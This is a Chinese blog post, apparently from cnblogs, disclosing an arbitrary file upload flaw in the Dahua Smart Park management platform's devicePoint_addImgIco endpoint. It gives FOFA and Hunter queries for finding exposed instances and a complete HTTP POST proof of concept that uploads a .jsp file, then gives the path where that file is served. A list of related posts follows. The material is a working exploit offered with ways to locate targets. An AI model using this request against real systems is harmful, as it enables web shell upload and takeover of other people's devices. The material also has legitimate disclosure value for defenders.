首页 > 其他分享 >大华智慧园区综合管理平台devicePoint_addImgIco任意文件上传漏洞

大华智慧园区综合管理平台devicePoint_addImgIco任意文件上传漏洞

时间:2023-08-29 09:44:21浏览次数:39  
标签:智慧 平台 Content addImgIco 大华 devicePoint 上传 园区

漏洞简介

大华智慧园区综合管理平台是一款综合管理平台,具备园区运营、资源调配和智能服务等功能。平台意在协助优化园区资源分配,满足多元化的管理需求,同时通过提供智能服务,增强使用体验。大华智慧园区设备开放了文件上传功能,但未在上传的文件类型、大小、格式、路径等方面进行严格的限制和过滤,导致攻击者可以通过构造恶意文件并上传到设备上。

漏洞复现

fofa语句:"/WPMS/asset/lib/gridster/"app="dahua-智慧园区综合管理平台"
鹰图语句:web.body="/WPMS/asset/lib/gridster/"
登录页面如下:

POC:

POST /emap/devicePoint_addImgIco?hasSubsystem=true HTTP/1.1
Content-Type: multipart/form-data; boundary=f3aeb22be281d77542546a2f71e20982
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Host: IP
Content-Length: 226
Expect: 100-continue
Connection: close

--f3aeb22be281d77542546a2f71e20982
Content-Disposition: form-data; name="upload"; filename="a.jsp"
Content-Type: application/octet-stream
Content-Transfer-Encoding: binary

h4jc4K1lT4
--f3aeb22be281d77542546a2f71e20982--


访问上传的文件
/upload/emap/society_new/ico_res_ffe925764fee_on.jsp

标签:智慧,平台,Content,addImgIco,大华,devicePoint,上传,园区
From: https://www.cnblogs.com/pursue-security/p/17663944.html

相关文章

  • 海康大华宇视等网络摄像机RTSP流采用websecket和H5进行RTSP网页无插件直播点播
    一.背景分析随着移动互联网时代的到来,安防监控领域为了适应互联网的发展要求,首先由国内安防监控龙头企业(海康、大华、宇视)带头先后开发了萤石云、乐橙云等互联网视频云服务,为广大个人或者企业监控用户提供的优质的视频互联网监控服务;而事实上,不管是海康大华等老牌监控厂商、还是新......
  • 大华智慧园区综合管理平台SQL注入漏洞复现
    一、产品简介大华智慧园区综合管理平台是一款综合管理平台,具备园区运营、资源调配和智能服务等功能。平台意在协助优化园区资源分配,满足多元化的管理需求,同时通过提供智能服务,增强使用体验。二、漏洞概述大华智慧园区综合管理平台未对用户的输入进行有效的过滤,直接将其拼接进了S......
  • 网页播放海康,威视,大华,华为摄像头RTSP流,延迟毫秒级,支持多路播放、H.264/H.265
    一、背景:在遍地都是摄像头的今天,往往需要在各种信息化、数字化、可视化B/S系统中集成实时视频流播放等功能,海康、大华、华为等厂家摄像头或录像机等设备一般也都遵循监控行业标准,支持国际标准的主流传输协议RTSP输出,而Chrome、Firefox、Edge等新一代浏览器从2015年开始取消了NPAPI......
  • 视频安防监控EasyCVR平台海康大华设备国标GB28181告警布防的报文说明
    TSINGSEE青犀视频监控综合管理平台EasyCVR基于云边端协同,可支持海量视频的轻量化接入与汇聚管理。平台既具备传统安防视频监控的能力,比如:视频监控直播、云端录像、云存储、录像检索与回看、告警上报、平台级联、云台控制、语音对讲等,也能接入AI智能分析的能力,包括人脸检测、车辆检......
  • TSINGSEE青犀视频安防监控EasyCVR平台海康大华设备国标GB28181告警布防的报文说明
    TSINGSEE青犀视频监控综合管理平台EasyCVR基于云边端协同,可支持海量视频的轻量化接入与汇聚管理。平台既具备传统安防视频监控的能力,比如:视频监控直播、云端录像、云存储、录像检索与回看、告警上报、平台级联、云台控制、语音对讲等,也能接入AI智能分析的能力,包括人脸检测、车辆检......
  • 大华-海康摄像头地址
    大华海康摄像头地址海康地址rtsp://[username]:[password]@[ip]:[port]/[codec]/[channel]/[subtype]/av_stream说明:username:用户名。例如admin。password:密码。例如12345。ip:为设备IP。例如192.0.0.64。port:端口号默认为554,若为默认可不填写。codec:有h264、MPEG......
  • 海康、大华、tplink监控摄像头和硬盘录像机接入GB28181平台配置细节
    海康、大华、tplink等各种型号监控摄像头或硬盘录像机(NVR/HVR)接入GB28181平台,配置过程都非常简单明了,但有些细节需要注意,避免走弯路踩泥坑。首先要说明一点的是,只要监控设备和GB28181平台的网络是连通的,都可以顺畅的接入,不需要为监控设备配置外网地址,更不需要做任何映射操作。本文......
  • EasyCVR平台接入大华对讲设备,设备端接收不到音频是什么原因?
    EasyCVR平台具有强大的数据接入、处理及分发能力,可支持海量视频的轻量化接入与汇聚管理。平台可支持绝大部分品牌的摄像头语音对讲功能。只要前端设备带语音功能,用户就可以通过摄像头与PC端进行语音对讲沟通,实现平台语音对讲喊话,该功能在视频监控场景中具有重要的意义。有用户反......
  • 大华三面-挂-云睿产品线
    自我介绍离职原因工作任务太多又需要保证质量时是怎么处理的稳定性(不涨工资)、加班多,有涨薪两种怎么选择当前工作的加班时间和频率。答:每周三天左右,8-9点,双休。面试官说这个是业界的普压,暗示大华更严重。当前手里有offer吗,给讲了一些小公司的坑(比如创业公司)期望的工作......
  • 大华面试java 2023.5
    一张表随着业务递增,如何对一个字段进行快速查询。比如对身高字段查询,要求查询是10的倍数的。考虑分库分表,或者提前计算设置标志位加索引OOM的场景有哪些,分别是什么情况下会出现这样的问题项目中的复杂设计开发流程springcloud动态更新class的原理,类加载机制,java中类加载......